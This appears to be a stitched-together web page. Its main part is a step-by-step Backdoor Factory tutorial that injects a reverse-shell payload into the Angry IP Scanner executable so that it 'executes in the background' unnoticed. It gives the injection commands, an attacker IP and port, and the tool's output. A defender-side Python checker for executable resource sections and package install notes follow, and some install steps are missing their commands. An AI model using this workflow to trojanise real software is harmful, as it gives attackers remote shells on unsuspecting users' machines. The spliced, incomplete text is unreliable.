Backdoor Factory – How to inject shellcode into a Windows application
Backdoor Factory (BDF) is an application pre-installed in Kali Linux that injects shellcode into Windows applications. BDF can inject custom shellcode into an existing binary by placing malicious code in between the genuine code. First it scans the binary and lists the compatible payloads; then it searches the whole file and displays the available caves where the malicious code can reside without affecting the working of the application. Code caves are created by compilers: a compiler has to pad certain areas of the binary, and it does so with long runs of 0x00 bytes, which are known as code caves. Backdoor Factory overwrites one of those caves with the shellcode. We choose a cave and the tool produces the patched executable.
The infected application works as intended, but the shellcode executes in the background, so a normal user notices nothing suspicious. This can target any Windows system regardless of version. Attackers use this tool as an alternative to the msfvenom payload generator. The workflow is the same as with an msfvenom payload: set up a reverse handler in msfconsole and wait for the victim to connect back. Personally I prefer this method over the old Windows hacking technique.
However, this will not work on protected applications, though most Windows applications are vulnerable to this attack. First of all you need to pick a lightweight portable executable; here I am injecting code into "Angry IP Scanner". Follow the steps below.
Step 1
Choose any application and use Backdoor Factory to check for the available payloads. The output looks like this:
root@anonymous:~/Desktop# backdoor-factory -f ip-scanner.exe -s show
Author: Joshua Pitts
Email: the.midnite.runr[-at ]gmailcom
Twitter: @midnite_runr
IRC: freenode.net #BDFactory
Version: 3.0.5
[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
The following WinIntelPE32s are available: (use -s)
cave_miner_inline
iat_reverse_tcp_inline
iat_reverse_tcp_inline_threaded
iat_reverse_tcp_stager_threaded
iat_user_supplied_shellcode_threaded
meterpreter_reverse_https_threaded
reverse_shell_tcp_inline
reverse_tcp_stager_threaded
user_supplied_shellcode_threaded
root@anonymous:~/Desktop#
Step 2
Now choose one of the shellcode payloads and inject it into the executable, giving the attacker IP and port for the reverse connection:
root@anonymous:~/Desktop# backdoor-factory -f ip-scanner.exe -s reverse_shell_tcp_inline -H 192.168.1.101 -P 444
Author: Joshua Pitts
Email: the.midnite.runr[-at ]gmailcom
Twitter: @midnite_runr
IRC: freenode.net #BDFactory
Version: 3.0.5
[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
[*] Looking for and setting selected shellcode
[*] Creating win32 resume execution stub
[*] Looking for caves that will fit the minimum shellcode length of 366
[*] All caves lengths: 366
############################################################
The following caves can be used to inject code and possibly
continue execution.
**Don’t like what you see? Use jump, single, append, or ignore.**
############################################################
[*] Cave 1 length as int: 366
[*] Available caves:
1. Section Name: None; Section Begin: None End: None; Cave begin: 0x26c End: 0x3fc; Cave Size: 400
2. Section Name: .text; Section Begin: 0x400 End: 0x4e00; Cave begin: 0x4c30 End: 0x4dfc; Cave Size: 460
3. Section Name: .rdata; Section Begin: 0x5000 End: 0x5600; Cave begin: 0x545e End: 0x55fc; Cave Size: 414
4. Section Name: .rsrc; Section Begin: 0x6200 End: 0x23000; Cave begin: 0xe398 End: 0xe580; Cave Size: 488
5. Section Name: .rsrc; Section Begin: 0x6200 End: 0x23000; Cave begin: 0xe598 End: 0xe784; Cave Size: 492
6. Section Name: .rsrc; Section Begin: 0x6200 End: 0x23000; Cave begin: 0xe79c End: 0xe984; Cave Size: 488
7. Section Name: .rsrc; Section Begin: 0x6200 End: 0x23000; Cave begin: 0xe9a0 End: 0xeb84; Cave Size: 484
8. Section Name: .rsrc; Section Begin: 0x6200 End: 0x23000; Cave begin: 0xeba4 End: 0xed84; Cave Size: 480
9. Section Name: .rsrc; Section Begin: 0x6200 End: 0x23000; Cave begin: 0xeda8 End: 0xef88; Cave Size: 480
10. Section Name: .rsrc; Section Begin: 0x6200 End: 0x23000; Cave begin: 0xefac End: 0xf188; Cave Size: 476
11. Section Name: .rsrc; Section Begin: 0x6200 End: 0x23000; Cave begin: 0xf1ac End: 0xf388; Cave Size: 476
12. Section Name: .rsrc; Section Begin: 0x6200 End: 0x23000; Cave begin: 0xf3b0 End: 0xf588; Cave Size: 472
13. Section Name: .rsrc; Section Begin: 0x6200 End: 0x23000; Cave begin: 0xf5b4 End: 0xf78c; Cave Size: 472
14. Section Name: .rsrc; Section Begin: 0x6200 End: 0x23000; Cave begin: 0xf7b8 End: 0xf98c; Cave Size: 468
15. Section Name: .rsrc; Section Begin: 0x6200 End: 0x23000; Cave begin: 0xf9bc End: 0xfb8c; Cave Size: 464
16. Section Name: .rsrc; Section Begin: 0x6200 End: 0x23000; Cave begin: 0xfbc0 End: 0xfd90; Cave Size: 464
17. Section Name: .rsrc; Section Begin: 0x6200 End: 0x23000; Cave begin: 0xfdc0 End: 0xff90; Cave Size: 464
18. Section Name: .rsrc; Section Begin: 0x6200 End: 0x23000; Cave begin: 0xffc4 End: 0x10190; Cave Size: 460
19. Section Name: .rsrc; Section Begin: 0x6200 End: 0x23000; Cave begin: 0x101c8 End: 0x10390; Cave Size: 456
20. Section Name: .rsrc; Section Begin: 0x6200 End: 0x23000; Cave begin: 0x10410 End: 0x10594; Cave Size: 388
22. Section Name: .rsrc; Section Begin: 0x6200 End: 0x23000; Cave begin: 0x1e0a0 End: 0x1e2ec; Cave Size: 588
23. Section Name: .rsrc; Section Begin: 0x6200 End: 0x23000; Cave begin: 0x22e21 End: 0x22ffc; Cave Size: 475
**************************************************
[!] Enter your selection:
All available caves are listed and the tool prompts for a selection. Choose any cave:
[!] Enter your selection: 11
[!] Using selection: 11
[*] Changing flags for section: .rsrc
[*] Patching initial entry instructions
[*] Creating win32 resume execution stub
[*] Looking for and setting selected shellcode
File ip-scanner.exe is in the ‘backdoored’ directory
Step 3
The backdoored file is written to the "backdoored" folder. Now set up the payload handler in msfconsole, choosing the same payload, port and IP that you gave BDF.
Wait a minute for msfconsole to come up, then use the handler module and set the payload and port.
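A defender-side check for the artefact that the Step 2 log makes visible ("Changing flags for section: .rsrc"): a resource or other data section that has become executable, or an entry point that lies outside .text. This is an added example, not code from the original post or from BDF; it parses the PE section table by hand and runs on two constructed header-only images whose layouts are assumed (they are not the real ip-scanner.exe).

```python
import struct

SCN_CNT_CODE, SCN_MEM_EXECUTE = 0x00000020, 0x20000000   # PE section characteristics
DATA_SECTIONS = {b".rsrc", b".rdata", b".data", b".reloc"}  # never carry code in a normal build

def parse_sections(pe):
    """Return (AddressOfEntryPoint, [(name, vaddr, vsize, characteristics), ...])."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                                   # 20-byte COFF file header
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    size_opt = struct.unpack_from("<H", pe, coff + 16)[0]
    opt = coff + 20
    entry_rva = struct.unpack_from("<I", pe, opt + 16)[0]  # same offset in PE32 and PE32+
    sections = []
    for i in range(num_sections):
        off = opt + size_opt + 40 * i                     # 40-byte IMAGE_SECTION_HEADER
        name = pe[off:off + 8].rstrip(b"\0")
        vsize, vaddr = struct.unpack_from("<II", pe, off + 8)
        chars = struct.unpack_from("<I", pe, off + 36)[0]
        sections.append((name, vaddr, vsize, chars))
    return entry_rva, sections

def suspicious_sections(pe):
    """Flag data sections marked executable and an entry point outside .text."""
    findings = []
    entry_rva, sections = parse_sections(pe)
    for name, vaddr, vsize, chars in sections:
        if name in DATA_SECTIONS and chars & (SCN_MEM_EXECUTE | SCN_CNT_CODE):
            findings.append(f"{name.decode()} is marked executable")
        if vaddr <= entry_rva < vaddr + vsize and name != b".text":
            findings.append(f"entry point 0x{entry_rva:x} lies in {name.decode()}")
    return findings

def build_pe(sections, entry_rva):
    """Constructed header-only PE32 image for the demo; not a runnable program."""
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)           # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x102)
    opt = struct.pack("<HBBIIII", 0x10B, 14, 0, 0, 0, 0, entry_rva).ljust(224, b"\0")
    table = b"".join(struct.pack("<8sIIIIIIHHI", n, vs, va, vs, 0, 0, 0, 0, 0, ch)
                     for n, va, vs, ch in sections)
    return dos + b"PE\0\0" + coff + opt + table

# Constructed samples: a clean layout and the same file after .rsrc was made executable
TEXT = (b".text", 0x1000, 0x4A00, 0x60000020)             # CODE | EXECUTE | READ
CLEAN_PE = build_pe([TEXT, (b".rsrc", 0x6000, 0x1CE00, 0x40000040)], 0x1200)
PATCHED_PE = build_pe([TEXT, (b".rsrc", 0x6000, 0x1CE00, 0x60000060)], 0x1200)
```

Running suspicious_sections over a real file's bytes gives the same kind of finding; a clean build returns an empty list, the patched layout reports the executable .rsrc section.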
backdoor-factory on Kali Linux
3. Details of backdoor-factory package
Package: backdoor-factory
Version: 3.4.2+dfsg-5
Installed-Size: 735
Maintainer: Debian Security Tools
Architecture: all
Depends: python3:any, curl, python3-capstone (>= 3.0), python3-pkg-resources (>= 39.2.0), python3-pefile, osslsigncode
Size: 86428
SHA256: a4d289bd629780a0b53a6396335f63c790ec34f8b077da7f82404d6f314a952a
SHA1: 9c5d83b476bfd5830b678a72615b550bfb3e1c4a
MD5sum: b738164f356b4e832367b7bc45877e0c
Description: Patch 32/64 bits ELF & win32/64 binaries with shellcode
Injects shellcode into win32/64 PE files, 32/64bits ELF binaries, to continue
normal file execution (if the shellcode supports it), by patching the exe/dll
directly.
.
Some executables have built in protections, as such this will not work on all
ELF/PE files. It is advisable that you test target ELF/PE files before
deploying them to clients or using them in exercises.
Description-md5: 7697c24a3682cefc109a5849b79d6b0c
Homepage: https://github.com/secretsquirrel/the-backdoor-factory
Section: utils
Priority: optional
Filename: pool/main/b/backdoor-factory/backdoor-factory_3.4.2+dfsg-5_all.deb
5. The same packages on other Linux Distributions
backdoor-factory (3.4.2+dfsg-2) Ubuntu 18.04 LTS (Bionic Beaver)
backdoor-factory (3.4.2+dfsg-5) Ubuntu 21.04 (Hirsute Hippo)
backdoor-factory (3.4.2+dfsg-4) Ubuntu 20.10 (Groovy Gorilla)
backdoor-factory (3.4.2+dfsg-5) Ubuntu 21.10 (Impish Indri)
backdoor-factory (3.4.2+dfsg-5) Ubuntu 22.04 LTS (Jammy Jellyfish)
backdoor-factory (3.4.2+dfsg-4) Debian 10 (Buster)
How To Install backdoor-factory on Kali Linux
In this tutorial we learn how to install backdoor-factory on Kali Linux.
What is backdoor-factory
Injects shellcode into win32/64 PE files, 32/64bits ELF binaries, to continue normal file execution (if the shellcode supports it), by patching the exe/dll directly.
Some executables have built-in protections, so this will not work on all ELF/PE files. It is advisable that you test target ELF/PE files before deploying them to clients or using them in exercises.
There are three ways to install backdoor-factory on Kali Linux: apt-get, apt and aptitude. The following sections describe each method; you can choose any one of them.
Install backdoor-factory Using apt-get
Update the apt database with apt-get using the following command.
After updating the apt database, we can install backdoor-factory using apt-get by running the following command:
sudo apt-get -y install backdoor-factory
Install backdoor-factory Using apt
Update the apt database with apt using the following command.
After updating the apt database, we can install backdoor-factory using apt by running the following command:
sudo apt -y install backdoor-factory
Install backdoor-factory Using aptitude
If you want to follow this method, you might need to install aptitude first, since aptitude is usually not installed by default on Kali Linux. Update the apt database with aptitude using the following command.
After updating the apt database, we can install backdoor-factory using aptitude by running the following command:
sudo aptitude -y install backdoor-factory
How To Uninstall backdoor-factory on Kali Linux
To uninstall only the backdoor-factory package we can use the following command:
sudo apt-get remove backdoor-factory
Uninstall backdoor-factory And Its Dependencies
To uninstall backdoor-factory and its dependencies that are no longer needed by Kali Linux, we can use the command below:
sudo apt-get -y autoremove backdoor-factory
Remove backdoor-factory Configurations and Data
To remove backdoor-factory configuration and data from Kali Linux we can use the following command:
sudo apt-get -y purge backdoor-factory
Remove backdoor-factory configuration, data, and all of its dependencies
To remove backdoor-factory configuration, data and all of its dependencies, we can use the following command:
sudo apt-get -y autoremove --purge backdoor-factory
Summary
In this tutorial we learned how to install backdoor-factory using different package management tools: apt, apt-get and aptitude.